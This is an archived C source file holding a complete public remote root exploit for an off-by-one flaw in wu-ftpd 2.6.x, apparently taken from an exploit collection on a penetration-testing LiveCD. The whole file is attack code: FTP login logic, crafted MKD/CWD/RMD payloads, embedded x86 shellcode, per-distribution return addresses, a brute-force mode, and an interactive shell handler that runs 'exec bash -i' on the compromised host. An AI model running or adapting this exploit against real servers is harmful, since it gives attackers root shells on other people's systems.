home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / wuftpd / 0x82-wu262.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  17.3 KB  |  703 lines
  1. /*
  2. **
  3. ** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
  4. ** Public version - 2003/08/02
  5. **
  6. ** --
  7. ** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
  8. ** Janusz Niewiadomski <funkysh@isec.pl>.
  9. ** They offered excellent Advisory, I'm thankful to them.
  10. **
  11. ** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
  12. **
  13. ** --
  14. ** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
  15. ** My World: http://x82.inetcop.org
  16. */
  17. /*
  18. ** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
  19. **
  20. ** More useful version isn't going to share. (various test version)
  21. ** For reference, exploit method that use `STOR' command succeeded. :-)
  22. **
  23. ** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
  24. **         August 3, Brute-Force function addition.
  25. ** --
  26. ** Thank you.
  27. **
  28. */
  29.  
  30. #define VERSION "v0.0.3"
  31. #include <stdio.h>
  32. #include <unistd.h>
  33. #include <stdlib.h>
  34. #include <netdb.h>
  35. #include <netinet/in.h>
  36. #include <sys/socket.h>
  37.  
  38. #define DEBUG_NG
  39. #undef DEBUG_NG
  40. #define NRL 0
  41. #define SCS 1
  42. #define FAD (-1)
  43. #define MAX_BF (16)
  44. #define BF_LSZ (0x100) /* 256 */
  45. #define DEF_VA 255
  46. #define DEF_PORT 21
  47. #define DEF_ANSH 11
  48. #define GET_HOST_NM_ERR (NULL)
  49. #define SIN_ZR_SIZE 8
  50. #define DEF_ALIGN 4
  51. #define GET_R 5000
  52. #define DEF_NOP 64
  53. #define DEF_STR "x0x"
  54. #define HOME_DIR "/home/"
  55. #define DEF_HOST "localhost"
  56. #define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
  57. "uname -a;id;export TERM=vt100;exec bash -i\n"
  58. /* ftpd handshake */
  59. #define FTP_CONN_SCS "220"
  60. #define FTP_USER_FAD "331"
  61. #define FTP_LOGIN_FAD "530 Login incorrect."
  62. #define FTP_LOGIN_SCS "230"
  63. #define CWD_COMM_SCS "250" /* also, RMD command */
  64. #define MKD_COMM_SCS "257"
  65. #define MKD_EXIST "521"
  66.  
  67. void ftpd_login(int sock,char *user,char *pass);
  68. void conn_shell(int conn_sock);
  69. int setsock(char *u_host,int u_port);
  70. void re_connt(int st_sock_va);
  71. void prcode_usage(char *f_nm);
  72. int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
  73. int send_shellcode(int sock,int type,char *dir_nm);
  74. void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
  75. int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
  76. u_long null_chk(u_long sh_addr);
  77. void banrl();
  78.  
  79. struct os
  80. {
  81.     int num;
  82.     char *v_nm;
  83.     u_long sh_addr;
  84. };
  85. int t_g=(NRL);
  86. char home_dir[(DEF_VA)]; /* user home directory offset */
  87. /*
  88. ** `0xff' uses two times to be realized in our shellcode.
  89. */
  90. char shellcode_ffx2[]=
  91.     /* setuid/chroot-break/execve shellcode by Lam3rZ */
  92.     "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
  93.     "\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
  94.     "\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
  95.     "\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
  96.     "\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
  97.     "\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
  98.     "\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
  99.     "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
  100.     "\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
  101.     "\x2e\x2e\x31\x31";
  102.  
  103. struct os plat[]=
  104. {
  105.     /*
  106.     ** I enjoy version up, will not share more. :-}
  107.     */
  108.     {
  109.         0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
  110.     },
  111.     {
  112.         1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
  113.     },
  114.     {
  115.         2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
  116.     },
  117.     {
  118.         0x82,NULL,0x0
  119.     },
  120.     {
  121.         0x8282,"Brute-Force mode",0x0806a082
  122.     }
  123. };
  124.  
  125. void prcode_usage(char *f_nm)
  126. {
  127.     int r_n=(NRL);
  128.     fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
  129.     fprintf(stdout," \t-h [hostname]   : Target hostname & ip.\n");
  130.     fprintf(stdout," \t-u [userid]     : User id.\n");
  131.     fprintf(stdout," \t-p [passwd]     : User password.\n");
  132.     fprintf(stdout," \t-n [port num]   : Target port number.\n");
  133.     fprintf(stdout," \t-s [shelladdr]  : Shellcode address.\n");
  134.     fprintf(stdout," \t-b              : Brute-Force mode.\n");
  135.     fprintf(stdout," \t-m [max num]    : Brute-Force Count number.\n");
  136.     fprintf(stdout," \t-i              : help information.\n");
  137.     fprintf(stdout," \t-t [target num] : Select target number.\n\n");
  138.     for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
  139.     {
  140.         fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
  141.     }
  142.     fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
  143.     exit(FAD);
  144. }
  145.  
  146. u_long null_chk(u_long sh_addr)
  147. {
  148.     if((sh_addr>>(NRL)&0xff)==(0x00))
  149.     {
  150.         return(sh_addr+=(SCS));
  151.     }
  152.     else return(sh_addr);
  153. }
  154.  
  155. void ftpd_login(int sock,char *user,char *pass)
  156. {
  157.     char send_recv[(GET_R)];
  158.  
  159.     (u_int)sleep(SCS);
  160.     memset((char *)send_recv,(NRL),sizeof(send_recv));
  161.     recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
  162.  
  163.     if(!strstr(send_recv,(FTP_CONN_SCS)))
  164.     {
  165.         fprintf(stdout," [-] ftpd connection failure.\n\n");
  166.         close(sock);
  167.         exit(FAD);
  168.     }
  169.     else fprintf(stdout," [*] ftpd connection success.\n");
  170.     fprintf(stdout," [+] User id input.\n");
  171.  
  172.     memset((char *)send_recv,(NRL),sizeof(send_recv));
  173.     snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
  174.     send(sock,send_recv,strlen(send_recv),(NRL));
  175.  
  176.     (u_int)sleep(SCS);
  177.     memset((char *)send_recv,(NRL),sizeof(send_recv));
  178.     recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
  179.  
  180.     if(!strstr(send_recv,(FTP_USER_FAD)))
  181.     {
  182.         fprintf(stdout," [-] User id input failure.\n\n");
  183.         close(sock);
  184.         exit(FAD);
  185.     }
  186.     else fprintf(stdout," [+] User password input.\n");
  187.  
  188.     memset((char *)send_recv,(NRL),sizeof(send_recv));
  189.     snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
  190.     send(sock,send_recv,strlen(send_recv),(NRL));
  191.  
  192.     (u_int)sleep(SCS);
  193.     memset((char *)send_recv,(NRL),sizeof(send_recv));
  194.     recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
  195.  
  196.     if(strstr(send_recv,(FTP_LOGIN_FAD)))
  197.     {
  198.         fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
  199.         close(sock);
  200.         exit(FAD);
  201.     }
  202.     else if(strstr(send_recv,(FTP_LOGIN_SCS)))
  203.     {
  204.         fprintf(stdout," [*] User %s logged in.\n",user);
  205.     }
  206.     else
  207.     {
  208.         fprintf(stdout," [-] ftpd handshake failure.\n\n");
  209.         close(sock);
  210.         exit(FAD);
  211.     }
  212.     return;
  213. }
  214.  
  215. int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
  216. {
  217.     int dr_n=(NRL),cmd_f=(NRL);
  218.     char get_nm[(GET_R)];
  219.  
  220.     memset((char *)dir_nm,(NRL),(GET_R));
  221.     /* MKD command */
  222.     dir_nm[cmd_f++]=(0x4d);
  223.     dir_nm[cmd_f++]=(0x4b);
  224.     dir_nm[cmd_f++]=(0x44);
  225.     dir_nm[cmd_f++]=(0x20);
  226.  
  227.     for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
  228.     {
  229.         dir_nm[dr_n]=(gb_character);
  230.     }
  231.     dir_nm[dr_n++]=(0x0d);
  232.     dir_nm[dr_n++]=(0x0a);
  233.  
  234.     if(type)
  235.     {
  236.         send(sock,dir_nm,strlen(dir_nm),(NRL));
  237.         (u_int)sleep(SCS);
  238.         memset((char *)get_nm,(NRL),sizeof(get_nm));
  239.         recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
  240.  
  241.         if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
  242.         {
  243.             fprintf(stdout," [-] MKD command failed.\n\n");
  244.             exit(FAD);
  245.         }
  246.     }
  247.     /* CMD command */
  248.     cmd_f=(NRL);
  249.     dir_nm[cmd_f++]=(0x43);
  250.     dir_nm[cmd_f++]=(0x57);
  251.     dir_nm[cmd_f++]=(0x44);
  252.  
  253.     send(sock,dir_nm,strlen(dir_nm),(NRL));
  254.     (u_int)sleep(SCS);
  255.     memset((char *)get_nm,(NRL),sizeof(get_nm));
  256.     recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
  257.  
  258.     if(!strstr(get_nm,(CWD_COMM_SCS)))
  259.     {
  260.         fprintf(stdout," [-] CWD command failed.\n\n");
  261.         exit(FAD);
  262.     }
  263.     return;
  264. }
  265.  
  266. int send_shellcode(int sock,int type,char *dir_nm)
  267. {
  268.     int dr_n=(NRL),cmd_f=(NRL);
  269.     char get_nm[(GET_R)];
  270.  
  271.     memset((char *)dir_nm,(NRL),(GET_R));
  272.     /* MKD command */
  273.     dir_nm[cmd_f++]=(0x4d);
  274.     dir_nm[cmd_f++]=(0x4b);
  275.     dir_nm[cmd_f++]=(0x44);
  276.     dir_nm[cmd_f++]=(0x20);
  277.  
  278.     for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
  279.     {
  280.         dir_nm[dr_n]=(DEF_NOP);
  281.     }
  282.     for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
  283.     {
  284.         dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
  285.     }
  286.     dir_nm[dr_n++]=(0x0d);
  287.     dir_nm[dr_n++]=(0x0a);
  288.  
  289.     if(type)
  290.     {
  291.         send(sock,dir_nm,strlen(dir_nm),(NRL));
  292.         (u_int)sleep(SCS);
  293.         memset((char *)get_nm,(NRL),sizeof(get_nm));
  294.         recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
  295.  
  296.         if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
  297.         {
  298.             fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
  299.             exit(FAD);
  300.         }
  301.     }
  302.     /* CMD command */
  303.     cmd_f=(NRL);
  304.     dir_nm[cmd_f++]=(0x43);
  305.     dir_nm[cmd_f++]=(0x57);
  306.     dir_nm[cmd_f++]=(0x44);
  307.  
  308.     send(sock,dir_nm,strlen(dir_nm),(NRL));
  309.     (u_int)sleep(SCS);
  310.     memset((char *)get_nm,(NRL),sizeof(get_nm));
  311.     recv(sock,get_nm,(GET_R)-1,(NRL));
  312.  
  313.     if(!strstr(get_nm,(CWD_COMM_SCS)))
  314.     {
  315.         fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
  316.         exit(FAD);
  317.     }
  318.     return;
  319. }
  320.  
  321. void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
  322. {
  323.     char atk_bf[(GET_R)];
  324.     {
  325.         fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
  326.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));    /* 01 */
  327.         fprintf(stdout," [+] 02: make shell-code directory.\n");
  328.         (int)send_shellcode(sock,d_type,(atk_bf));    /* 02 */
  329.         fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
  330.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));    /* 03 */
  331.         fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
  332.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));    /* 04 */
  333.         fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
  334.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));    /* 05 */
  335.         fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
  336.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));    /* 06 */
  337.         fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
  338.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));    /* 07 */
  339.         fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
  340.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));    /* 08 */
  341.         fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
  342.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));    /* 09 */
  343.         fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
  344.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));    /* 10 */
  345.         fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
  346.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));    /* 11 */
  347.         fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
  348.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));    /* 12 */
  349.         fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
  350.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));    /* 13 */
  351.         fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
  352.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));    /* 14 */
  353.         fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
  354.         (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));    /* 15 */
  355.         (int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
  356.     }
  357.     return;
  358. }
  359.  
  360. int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
  361. {
  362.     int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
  363.     char get_nm[(GET_R)];
  364.  
  365.     memset((char *)atk_bf,(NRL),(GET_R));
  366.     if(type) /* MKD command */
  367.     {
  368.         atk_bf[cmd_f++]=(0x4d);
  369.         atk_bf[cmd_f++]=(0x4b);
  370.         atk_bf[cmd_f++]=(0x44);
  371.         atk_bf[cmd_f++]=(0x20);
  372.     }
  373.     else /* RMD command */
  374.     {
  375.         atk_bf[cmd_f++]=(0x52);
  376.         atk_bf[cmd_f++]=(0x4d);
  377.         atk_bf[cmd_f++]=(0x44);
  378.         atk_bf[cmd_f++]=(0x20);
  379.     }
  380.     for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
  381.         atk_bf[r_rn_1++]=(0x41);
  382.     {
  383.         *(long *)&atk_bf[r_rn_1]=(sh_addr);
  384.         r_rn_1+=(DEF_ALIGN);
  385.         *(long *)&atk_bf[r_rn_1]=(sh_addr);
  386.         r_rn_1+=(DEF_ALIGN);
  387.         atk_bf[r_rn_1++]=(0x41);
  388.         atk_bf[r_rn_1++]=(0x41);
  389.         atk_bf[r_rn_1++]=(0x41);
  390.         atk_bf[r_rn_1++]=(0x0d);
  391.         atk_bf[r_rn_1++]=(0x0a);
  392.     }
  393.     send(sock,atk_bf,strlen(atk_bf),(NRL));
  394.     (u_int)sleep(SCS);
  395.     memset((char *)get_nm,(NRL),sizeof(get_nm));
  396.     recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
  397.  
  398.     if(type) /* MKD command */
  399.     {
  400.         if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
  401.         {
  402.             fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
  403.             exit(FAD);
  404.         }
  405.         else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
  406.     }
  407.     else /* RMD command */
  408.     {
  409.         if(!strstr(get_nm,(CWD_COMM_SCS)))
  410.         {
  411.             fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
  412.             exit(FAD);
  413.         }
  414.         else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
  415.     }
  416.     return;
  417. }
  418.  
  419. int main(int argc,char *argv[])
  420. {
  421.     int opt_g,sock,__bf=(NRL);
  422.     int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
  423.     char user_id[(DEF_VA)]=(DEF_STR);
  424.     char pass_wd[(DEF_VA)]=(DEF_STR);
  425.     char tg_host[(DEF_VA)]=(DEF_HOST);
  426.     int tg_port=(DEF_PORT);
  427.     u_long sh_addr=(plat[t_g].sh_addr);
  428.  
  429.     (void)banrl();
  430.     while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
  431.     {
  432.         extern char *optarg;
  433.         switch(opt_g)
  434.         {
  435.             case 'M':
  436.             case 'm':
  437.                 mx_bf=(atoi(optarg));
  438.                 bf_lsz=((0x1000)/mx_bf);
  439.                 break;
  440.  
  441.             case 'H':
  442.             case 'h':
  443.                 memset((char *)tg_host,(NRL),sizeof(tg_host));
  444.                 strncpy(tg_host,optarg,sizeof(tg_host)-1);
  445.                 break;
  446.                 
  447.             case 'U':
  448.             case 'u':
  449.                 memset((char *)user_id,(NRL),sizeof(user_id));
  450.                 strncpy(user_id,optarg,sizeof(user_id)-1);
  451.                 break;
  452.                 
  453.             case 'P':
  454.             case 'p':
  455.                 memset((char *)pass_wd,(NRL),sizeof(pass_wd));
  456.                 strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
  457.                 break;
  458.                 
  459.             case 'N':
  460.             case 'n':
  461.                 tg_port=(atoi(optarg));
  462.                 break;
  463.                 
  464.             case 'S':
  465.             case 's':
  466.                 sh_addr=strtoul(optarg,(NRL),(NRL));
  467.                 break;
  468.                 
  469.             case 'T':
  470.             case 't':
  471.                 if((t_g=(atoi(optarg)))<(3))
  472.                     sh_addr=(plat[t_g].sh_addr);
  473.                 else (void)prcode_usage(argv[(NRL)]);
  474.                 break;
  475.                 
  476.             case 'B':
  477.             case 'b':
  478.                 __bf=(SCS);
  479.                 break;
  480.                 
  481.             case 'I':
  482.             case 'i':
  483.                 (void)prcode_usage(argv[(NRL)]);
  484.                 break;
  485.                 
  486.             case '?':
  487.                 (void)prcode_usage(argv[(NRL)]);
  488.                 break;
  489.         }
  490.     }
  491.     if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
  492.         (void)prcode_usage(argv[(NRL)]);
  493.     
  494.     memset((char *)home_dir,(NRL),sizeof(home_dir));
  495.     snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);
  496.  
  497.     if(!__bf)
  498.     {
  499.         fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
  500.         fprintf(stdout," [+] address: %p.\n",sh_addr);
  501.         fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
  502.         fflush(stdout);
  503.  
  504.         sock=(int)setsock(tg_host,tg_port);
  505.         (void)re_connt(sock);
  506.         fprintf(stdout," [  OK  ]\n");
  507.  
  508.         fprintf(stdout," [1] ftpd connection login.\n");
  509.         (void)ftpd_login(sock,user_id,pass_wd);
  510.  
  511.         fprintf(stdout," [2] send exploit code.\n");
  512.         (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
  513.         close(sock);
  514.  
  515.         fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
  516.         fflush(stdout);
  517.  
  518.         sock=(int)setsock(tg_host,tg_port);
  519.         (void)re_connt(sock);
  520.         fprintf(stdout," [  OK  ]\n");
  521.  
  522.         fprintf(stdout," [3] ftpd connection login.\n");
  523.         (void)ftpd_login(sock,user_id,pass_wd);
  524.  
  525.         fprintf(stdout," [4] send exploit code.\n");
  526.         (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
  527.  
  528.         fprintf(stdout," [5] Waiting, execute the shell ");
  529.         fflush(stdout);
  530.         (u_int)sleep(SCS);
  531.         
  532.         fprintf(stdout,".");
  533.         fflush(stdout);
  534.         (u_int)sleep(SCS);
  535.         
  536.         fprintf(stdout,".");
  537.         fflush(stdout);
  538.         (u_int)sleep(SCS);
  539.  
  540.         fprintf(stdout,".\n");
  541.         (void)conn_shell(sock);
  542.         close(sock);
  543.     }
  544.     else
  545.     {
  546.         int bt_num=(NRL);
  547.         t_g=(4);
  548.         sh_addr=(plat[t_g].sh_addr);
  549.         fprintf(stdout," [*] Brute-Force mode.\n");
  550.         fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
  551.         fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);
  552.  
  553.         for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
  554.         {
  555.             sh_addr=(u_long)null_chk(sh_addr);
  556.             fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
  557.             fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
  558.             fflush(stdout);
  559.             
  560.             sock=(int)setsock(tg_host,tg_port);
  561.             (void)re_connt(sock);
  562.             fprintf(stdout," [  OK  ]\n");
  563.             
  564.             fprintf(stdout," [1] ftpd connection login.\n");
  565.             (void)ftpd_login(sock,user_id,pass_wd);
  566.             
  567.             fprintf(stdout," [2] send exploit code.\n");
  568.             if(bt_num==(NRL))
  569.             {
  570.                 (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
  571.             }
  572.             else
  573.             {
  574.                 (void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
  575.             }
  576.             close(sock);
  577.             
  578.             fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
  579.             fflush(stdout);
  580.             
  581.             sock=(int)setsock(tg_host,tg_port);
  582.             (void)re_connt(sock);
  583.             fprintf(stdout," [  OK  ]\n");
  584.             
  585.             fprintf(stdout," [3] ftpd connection login.\n");
  586.             (void)ftpd_login(sock,user_id,pass_wd);
  587.             
  588.             fprintf(stdout," [4] send exploit code.\n");
  589.             (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
  590.             
  591.             fprintf(stdout," [5] Waiting, execute the shell ");
  592.             fflush(stdout);
  593.             (u_int)sleep(SCS);
  594.  
  595.             fprintf(stdout,".");
  596.             fflush(stdout);
  597.             (u_int)sleep(SCS);
  598.             
  599.             fprintf(stdout,".");
  600.             fflush(stdout);
  601.             (u_int)sleep(SCS);
  602.             
  603.             fprintf(stdout,".\n");
  604.             (void)conn_shell(sock);
  605.             close(sock);
  606.  
  607.             sh_addr+=(bf_lsz);
  608.         }
  609.     }
  610.     exit(NRL);
  611. }
  612.  
  613. int setsock(char *u_host,int u_port)
  614. {
  615.     int sock;
  616.     struct hostent *sxp;
  617.     struct sockaddr_in sxp_addr;
  618.  
  619.     if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
  620.     {
  621.         return(FAD);
  622.     }
  623.     if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
  624.     {
  625.         return(FAD);
  626.     }
  627.     sxp_addr.sin_family=AF_INET;
  628.     sxp_addr.sin_port=htons(u_port);
  629.     sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
  630.     bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));
  631.  
  632.     if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
  633.     {
  634.         return(FAD);
  635.     }
  636.     return(sock);
  637. }
  638.  
  639. void conn_shell(int conn_sock)
  640. {
  641.     int died;
  642.     int ex_t=(NRL);
  643.     char *command=(DEF_COMM);
  644.     char readbuf[(GET_R)];
  645.     fd_set rset;
  646.  
  647.     memset((char *)readbuf,(NRL),sizeof(readbuf));
  648.     fprintf(stdout," [*] Send, command packet !\n\n");
  649.     send(conn_sock,command,strlen(command),(NRL));
  650.  
  651.     for(;;)
  652.     {
  653.         fflush(stdout);
  654.         FD_ZERO(&rset);
  655.         FD_SET(conn_sock,&rset);
  656.         FD_SET(STDIN_FILENO,&rset);
  657.         select(conn_sock+1,&rset,NULL,NULL,NULL);
  658.  
  659.         if(FD_ISSET(conn_sock,&rset))
  660.         {
  661.             died=read(conn_sock,readbuf,sizeof(readbuf)-1);
  662.             if(died<=(NRL))
  663.             {
  664.                 if(!ex_t)
  665.                     return;
  666.                 else
  667.                     exit(NRL);
  668.             }
  669.             readbuf[died]=(NRL);
  670.             fprintf(stdout,"%s",readbuf);
  671.         }
  672.         if(FD_ISSET(STDIN_FILENO,&rset))
  673.         {
  674.             died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
  675.             if(died>(NRL))
  676.             {
  677.                 readbuf[died]=(NRL);
  678.                 if(strstr(readbuf,"exit"))
  679.                     ex_t=(SCS);
  680.                 write(conn_sock,readbuf,died);
  681.             }
  682.         }
  683.     }
  684.     return;
  685. }
  686.  
  687. void re_connt(int st_sock_va)
  688. {
  689.     if(st_sock_va==(FAD))
  690.     {
  691.         fprintf(stdout," [ Fail ]\n\n");
  692.         exit(FAD);
  693.     }
  694. }
  695.  
  696. void banrl()
  697. {
  698.     fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
  699. }
  700.  
  701. /* eoc */
  702.  
  703.